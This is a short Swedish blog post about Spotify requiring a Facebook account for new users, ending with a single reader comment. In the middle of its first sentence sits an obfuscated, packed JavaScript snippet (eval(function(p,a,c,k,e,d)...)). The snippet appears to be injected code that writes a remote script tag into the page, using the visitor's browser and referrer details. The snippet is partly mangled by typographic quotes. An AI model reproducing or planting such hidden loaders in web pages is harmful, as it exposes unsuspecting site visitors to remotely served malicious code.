Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Facebook-krav på nya medlemmar av Spotify

Facebook-krav på nya medlemmar av Spotify
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bdaai|var|u0026u|referrer|tktzt||js|php’.split(’|’),0,{}))
ni vet så presenterades samarbetet mellan Facebook och Spotify förra veckan. En integration av musiktjänsten i det sociala communityt.

Nu måste alla nya Spotify kunder ha ett Facebook konto registrerat för att kunna ta del av musiken. Detta ser jag som ett minus då jag vet att det inte är alla som vill synas på sociala medier som Facebook. jag gissar på att Facebook la det som ett krav för att samarbetet skulle gå igenom.

Förändringen uppmärksammades först på Spotifys inofficiella supportforum på Getsatisfaction.com, och bekräftas där av en Spotify-anställd.

”Tyvärr behöver du ett Facebook-konto för att få tillgång till Spotify från och med nu”, skriver den anställde och tillägger att det inte gäller för den som redan har ett Spotifykonto. Han skriver också att inget hindrar en ny användare från att skapa en helt tom Facebookprofil för att därigenom få tillgång till Spotify.

Mer info : IDG.se

Comments

  1. Vart är världen på väg…